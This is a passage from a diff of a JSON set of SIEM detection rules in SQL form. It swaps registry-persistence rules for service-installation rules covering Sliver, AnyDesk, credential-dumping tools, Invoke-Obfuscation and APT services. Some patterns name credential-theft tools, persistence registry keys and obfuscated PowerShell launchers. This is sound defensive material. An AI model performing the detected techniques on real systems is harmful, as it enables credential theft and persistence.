It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 
1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the anydesk tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": 
"registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1137.002" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Windows Service Terminated With Error", + "id": "acfa2210-0d71-4eeb-b477-afab494d596c", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" + "False positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7023')" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_terminated_error_generic.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to 
allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "status": "experimental", + "description": "Detects PAExec service installation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": 
[ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated 
powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", - "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" - ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" - }, - { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "status": "test", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT 
((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' 
ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName 